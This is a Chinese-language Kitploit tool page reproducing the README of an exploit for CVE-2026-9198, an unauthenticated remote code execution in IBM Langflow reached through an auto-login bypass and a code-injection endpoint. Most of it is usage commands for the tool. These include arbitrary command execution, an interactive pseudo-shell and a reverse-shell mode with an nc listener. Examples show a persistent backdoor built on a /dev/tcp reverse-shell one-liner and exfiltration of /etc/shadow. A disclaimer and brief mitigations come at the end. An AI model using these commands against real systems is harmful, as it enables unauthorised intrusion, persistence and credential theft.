Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-9198 — IBM Langflow 未授权 RCE 通过 Auto-Login Bypass | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Payload生成漏洞利用Web应用程序漏洞利用命令与控制身份验证红队远程访问工具
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow 未授权 RCE 通过 Auto-Login Bypass

查看仓库
111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Langflow 标志

🚨 CVE-2026-9198

IBM Langflow OSS 未经身份验证的远程代码执行(通过自动登录绕过)

许可证: MIT Python 3.6+ 安全


📋 概述

CVE-2026-9198 是 IBM Langflow OSS 中的一个关键未经身份验证的远程代码执行漏洞。该利用程序链式利用了以下两个漏洞:

  • CVE-2026-9103:自动登录绕过,允许未经身份验证的调用者获取超级用户 JWT 令牌
  • CVE-2026-8481:/api/v1/validate/code 端点中的代码注入,允许任意 Python 执行

⚠️ 警告:此工具仅用于授权的安全测试和教育目的。未经授权的使用是非法的。


🚀 特性

  • 🔓 自动登录绕过 — 自动获取超级用户 JWT 令牌
  • 💻 交互式伪 Shell — 动态提示符,显示用户名和当前目录
  • 📝 单命令执行 — 运行任意系统命令
  • 🔄 反弹 Shell — 单行反弹 Shell 负载投递
  • 🎨 彩色输出 — 使用 ANSI 颜色提供视觉反馈
  • ⚡ 快速可靠 — 内置健壮的错误处理

📦 安装

前提条件

  • Python 3.6 或更高版本
  • pip 包管理器

步骤 1:克隆仓库

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

步骤 2:安装依赖项

root@kitploit:~
pip install termcolor

或者一次性安装所有依赖项:

root@kitploit:~
pip install -r requirements.txt

步骤 3:验证安装

root@kitploit:~
python CVE-2026-9198.py --help

您应该会看到包含所有可用选项的帮助菜单。


🎯 使用方法

基础命令执行

在目标上执行单个命令:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

示例:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

交互式伪 Shell

启动带有动态提示符的交互式 Shell:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

特性:

  • 动态提示符,显示 user@host 和当前目录
  • 支持 cd 命令,并自动更新提示符
  • 命令历史(取决于终端)
  • 干净的输出格式

示例会话:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

反弹 Shell

发送反弹 Shell 负载到监听器:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

示例:

root@kitploit:~
# 在您的机器上 - 启动监听器
nc -lvnp 4444

# 然后运行利用程序
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

自定义端口

如果 Langflow 运行在非默认端口上:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

示例:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

使用已获取的令牌

跳过自动登录过程并使用现有令牌:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

超时配置

为较慢的网络调整 HTTP 超时:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 命令行参数


🔧 示例

1. 基本信息收集

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. 文件系统探索

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# 然后在 Shell 内:
ls -la
cat /etc/passwd

3. 持久后门

root@kitploit:~
# 创建一个持久性的反弹 Shell
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. 网络扫描(从目标)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. 泄露敏感文件

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ 缓解措施

为防范此漏洞:

  1. 在生产环境中禁用自动登录
  2. 应用 IBM 发布的 Langflow 补丁
  3. 限制对 Langflow 管理接口的网络访问
  4. 监控对 /api/v1/auto_login 和 /api/v1/validate/code 的异常 API 请求
  5. 使用 WAF 规则阻止可疑负载模式

⚠️ 免责声明

此工具仅供教育和授权的安全测试目的使用。作者不对因使用本软件而导致的任何误用或损害负责。用户有责任遵守适用的法律法规。


📄 许可证

本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。


👨‍💻 作者

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • 安全研究员与渗透测试员

📚 参考

  • CVE-2026-9198 详情
  • CVE-2026-9103 - 自动登录绕过
  • CVE-2026-8481 - 代码注入
  • Langflow 官方网站

🤝 贡献

欢迎贡献!请随时提交 Pull Request。

  1. Fork 此仓库
  2. 创建您的特性分支 (git checkout -b feature/AmazingFeature)
  3. 提交您的更改 (git commit -m 'Add some AmazingFeature')
  4. 推送到分支 (git push origin feature/AmazingFeature)
  5. 打开一个 Pull Request

⭐ Star 历史

如果您觉得此工具有用,请在 GitHub 上给它一个 ⭐!


由 0xgh057r3c0n 用 ❤️ 制作
下载工具
参数描述必需默认值
-t, --target目标主机/IP 或完整 URL✅ 是-
-p, --portLangflow 端口❌ 否7860
-c, --cmd执行单个命令❌ 否"id"
--shell交互式伪 Shell 模式❌ 否False
--lhost反弹 Shell 监听器 IP❌ 否-
--lport反弹 Shell 监听器端口❌ 否4444
-k, --token使用提供的 Bearer 令牌❌ 否-
--timeoutHTTP 超时(秒)❌ 否20
--no-banner隐藏横幅❌ 否False